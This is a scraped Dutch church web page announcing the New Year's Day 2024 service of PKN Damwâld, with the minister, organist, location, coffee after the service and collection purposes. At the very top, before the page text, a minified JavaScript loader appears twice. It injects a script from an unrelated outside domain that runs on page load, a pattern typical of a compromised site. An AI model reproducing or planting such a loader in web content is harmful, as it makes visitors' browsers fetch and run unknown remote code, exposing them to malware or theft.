;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst nieuwjaarsdag 2024 - PKN Damwâld
maandag 1 januari 2024
10:00 uur
Koffiedrinken na de dienst

Kerkdienst nieuwjaarsdag 2024

Informatie

Voorganger:Ds. G.J. Otter
Organist:Margrietha Zagema
Mededeling:Koffiedrinken na de dienst
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Kerk
Uitganscollecte: Uitgangscollecte t.b.v. de gestegen energiekosten